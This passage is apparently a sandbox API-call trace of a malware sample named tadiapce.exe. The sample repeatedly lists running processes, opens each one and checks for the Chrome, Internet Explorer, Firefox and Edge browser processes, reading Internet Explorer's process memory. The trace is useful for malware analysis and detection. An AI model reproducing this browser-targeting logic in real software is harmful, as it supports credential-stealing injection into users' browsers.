	[0235.541] ReadProcessMemory (in: hProcess=0x768c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0235.541] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0235.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0235.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7690
	[0235.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.542] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0235.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.542] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0235.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.542] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0235.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.542] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.543] NtQueryInformationProcess (in: ProcessHandle=0x7690, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0235.543] ReadProcessMemory (in: hProcess=0x7690, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0235.543] ReadProcessMemory (in: hProcess=0x7690, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0235.543] ReadProcessMemory (in: hProcess=0x7690, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0235.543] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0235.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0235.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7694
	[0235.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.544] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0235.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.544] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.545] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0235.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.546] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0235.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7698
	[0235.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.547] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0235.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.547] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.548] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0235.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.548] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x769c
	[0235.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.549] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.549] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.550] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.550] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.550] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x76a0
	[0235.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.552] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.552] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.552] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.553] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x76a4
	[0235.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.554] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.554] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.555] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.555] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0235.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x76a8
	[0235.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.556] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0235.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.556] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.557] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0235.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.557] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x76ac
	[0235.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.558] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.559] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.559] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.559] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.559] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x76b0
	[0235.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.560] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.561] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.562] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.562] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0235.563] CloseHandle (hObject=0x4fd0) returned 1
	[0235.563] Sleep (dwMilliseconds=0x64) 
	[0236.004] GetCurrentProcessId () returned 0x110
	[0236.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0236.007] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0236.008] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0236.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0236.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x76b4
	[0236.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.011] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.011] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.012] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.012] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x76b8
	[0236.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.015] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.015] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.015] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.016] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0236.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x76bc
	[0236.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.018] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0236.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.018] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.019] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0236.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.019] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.019] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x76c0
	[0236.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.021] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.021] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.022] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.022] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0236.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x76c4
	[0236.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.024] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0236.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.024] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.025] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0236.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.025] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0236.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x76c8
	[0236.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.027] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0236.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.027] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.028] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0236.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.029] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0236.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x76cc
	[0236.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.031] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0236.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.032] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.032] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0236.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.032] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0236.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x76d0
	[0236.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.034] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.034] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.035] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.035] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x76d4
	[0236.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.037] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.037] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.038] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.038] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x76d8
	[0236.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.040] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.041] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x76dc
	[0236.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.043] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x76e0
	[0236.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.047] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.047] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.047] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.048] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.048] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x76e4
	[0236.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.049] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.050] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
